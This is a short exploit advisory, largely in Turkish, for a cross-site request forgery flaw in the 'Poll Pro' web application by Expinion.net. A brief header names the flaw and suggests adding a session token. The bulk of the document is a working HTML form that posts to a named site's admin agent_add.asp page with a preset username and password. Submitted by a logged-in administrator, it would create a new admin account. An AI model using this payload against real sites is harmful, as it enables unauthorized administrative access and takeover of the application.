< ------------------- header data start ------------------- >

#############################################################

# Application Name :Poll Pro by Expinion.net

# vulnerable Type : xsrf

# Infection : Yeni Bir Admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.europeum.net/Demos/PP/admin/agent_add.asp name=frm method=post onSubmit=return ValidAgent()>
<input style=width: 400px; type=Text name=username value=cwhirlpool size=45 maxlength=25 class=textbox /></td>
<input style=width: 400px; type=password name=password size=45 value=bugresearchers maxlength=25 class=textbox /></td>
<input style=width: 400px; type=Text name=name size=45 value=cwhirlpool bugres maxlength=80 class=textbox /></td>
<input type=Checkbox name=enable checked value=1 /></td>
<input type=Submit value=Add Agent /></td>
<input type=Hidden name=mode value=add />
</form>

< -- bug code end of -- >